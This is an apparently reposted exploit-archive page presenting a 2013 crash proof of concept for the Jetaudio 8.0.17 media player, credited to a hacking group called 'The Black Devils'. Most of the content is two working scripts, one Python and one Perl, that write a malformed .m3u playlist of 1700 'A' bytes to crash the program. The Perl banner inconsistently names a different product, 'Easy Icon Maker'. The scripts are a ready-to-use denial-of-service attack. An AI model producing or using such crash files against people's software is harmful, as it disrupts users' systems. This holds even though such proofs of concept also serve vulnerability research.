Jetaudio 8.0.17 Crash Proof Of Concept

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Jetaudio 8.0.17 Crash Proof Of Concept

来源：mr.k4rizma@gmail.com 作者：Devils 发布时间：2013-08-13

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

#0     _                   __           __       __                     1

#1 /' \ __ /'__`\ /\ \__ /'__`\ 0

#0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1

#1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0

#0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1

#1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0

#0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1

#1 \ \____/ >> Exploit database separated by exploit 0

#0 \/___/ type (local, remote, DoS, etc.) 1

#1                                                                      1

#0 [+] Site : 1337day.com 0

#1 [+] Support e-mail : submit[at]1337day.com 1

#0                                                                      0

#1 ######################################### 1

#0 I'm The Black Devils member from Inj3ct0r Team 1

#1 ######################################### 0

#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# Exploit Title: Jetaudio 8.0.17 basic Crash PoC

# Date: 18-07-2013

# Exploit Author: The Black Devils "Asesino04"

# Vendor Homepage: http://www.jetaudio.com/download/

# Version: 8.0.17 & old versions

# Tested on: [ Windows 7]

# Introduction :

-----------------

Jetaudio 8.0.17 basic is suffering from a crash poc vulnerability

# Exploit Code (python) :

------------------

# !/usr/bin/python

header="http://"

poc= "\x41" * 1700

file = open("asesino04.m3u","w")

file.write(header+poc)

file.close()

-------------------

#!/usr/bin/perl

system("title The Black Devils");

system("color 1e");

system("cls");

print "\n\n";

print " |=======================================================|\n";

print " |= [!] Name : Easy Icon Maker Version =|\n";

print " |= [!] Exploit : Crash Exploit =|\n";

print " |= [!] Author : The Black Devils =|\n";

print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";

print " |=======================================================|\n";

sleep(2);

print "\n";

# Creating ...

my $header="http://" ;

my $PoC = "\x41" x 1700 ; #

open(file , ">", "inj3ct0rs.m3u");

print file $PoC;

print "\n [+] File successfully created!\n" or die print "\n [-] OupsS! File is Not Created !! ";

close(file);

References:

http://downloads.securityfocus.com/vulnerabilities/exploits/61400.py

http://packetstormsecurity.com/files/122504/Jetaudio-8.0.17-Crash-Proof-Of-Concept.html

http://cxsecurity.com/issue/WLB-2013070167

# Contact :

------------------

# Fane Page : www.facebook.com/Th3.Black.D3Vils

# Youtube : www.youtube.com/user/Th3BlackDevils

# Facebook : www.facebook.com/DevilsDz

# Email : mr.k4rizma@gmail.com

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告